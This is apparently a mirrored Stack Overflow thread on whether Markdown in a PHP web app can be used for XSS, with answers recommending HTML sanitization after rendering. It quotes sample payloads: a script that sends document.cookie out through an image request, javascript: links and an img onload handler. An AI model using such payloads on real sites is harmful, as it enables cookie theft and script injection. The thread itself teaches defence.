
I'm working on a web application that allows users to type short descriptions of items in a catalog. I'm allowing Markdown in my textareas so users can do some HTML formatting.

My text sanitization function strips all tags from any inputted text before inserting it in the database:

public function sanitizeText($string, $allowedTags = "") {
    $string = strip_tags($string, $allowedTags);

    if(get_magic_quotes_gpc()) {
        return mysql_real_escape_string(stripslashes($string));
    } else {
        return mysql_real_escape_string($string);

Essentially, all I'm storing in the database is Markdown--no other HTML, even "basic HTML" (like here at SO) is allowed.

Will allowing markdown present any security threats? Can markdown be XSSed, even though it has no tags?

Was it helpful?


I think stripping any HTML tag from the input will get you something pretty secure -- except if someone find a way to inject some really messed up data into Markdown, having it generate some even more messed-up output ^^

Still, here are two things that come to my mind :

First one : strip_tags is not a miracle function : it has some flaws...
For instance, it'll strip everything after the '<', in a situation like this one :

$str = "10 appels is <than 12 apples";

The output I get is :

string '10 appels is ' (length=13)

Which is not that nice for your users :-(

Second one : One day or another, you might want to allow some HTML tags/attributes ; or, even today, you might want to be sure that Markdown doesn't generate some HTML Tags/attributes.

You might be interested by something like HTMLPurifier : it allows you to specify which tags and attributes should be kept, and filters a string, so that only those remain.

It also generates valid HTML code -- which is always nice ;-)


Here's a lovely example of why you need to sanitize the HTML after, not before:

Markdown code:

>  <script type="text/javascript"
>  language="js">i=new Image\(\); i.src=''
> + escape\(window.location\) + '&c=' + escape\(document.cookie\);
> </script>

Rendered as:

<p><script type="text/javascript"
 language="js">i=new Image(); i.src=''
+ escape(window.location) + '&amp;c=' + escape(document.cookie);

Now are you worried?

Sanitizing the resulting HTML after rendering the Markdown is going to be safest. If you don't, I think that people would be able execute arbitrary Javascript in Markdown like so:

[Click me](javascript:alert\('Gotcha!'\);)

PHP Markdown converts this to:

<p><a href="javascript:alert&#40;'Gotcha!'&#41;;">Click me</a></p>

Which does the job. ...and don't even think about beginning to add in code to take care of these cases. Correct sanitization isn't easy, just use a good tool and apply it after you render your Markdown into HTML.

Will allowing markdown present any security threats? Can markdown be XSSed, even though it has no tags?

It's almost impossible to make absolute statements in that regard - who can say what the markdown parser can be tricked into with sufficiently malformed input?

However, the risk is probably very low, since it is a relatively simple syntax. The most obvious angle of attack would be javascript: URLs in links or images - probably not allowed by the parser, but it's something I'd check out.

No. The way you are using Markdown is not secure. Markdown can be used securely, but you have to use it right. For details on how to use Markdown securely, look here. See the link for details about how to use it safely, but the short version is: it is important to use the latest version, to set safe_mode, and to set enable_attributes=False.

The link also explains why escaping the input and then calling Markdown (as you are doing) is not sufficient to be secure. Short example: "[clickme](javascript:alert%28%22xss%22%29)".

BBcode provides more safety because you are generating the tags.

<img src="" onload="javascript:alert(\'haha\');"/>

If <img> is allowed, this will go straight through strip_tags ;) Bam !

I agree with Pascal MARTIN that HTML Sanitization is a better approach. If you want to do it entirely in JavaScript I suggest taking a look at google-caja's sanitization library (source code).

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow
scroll top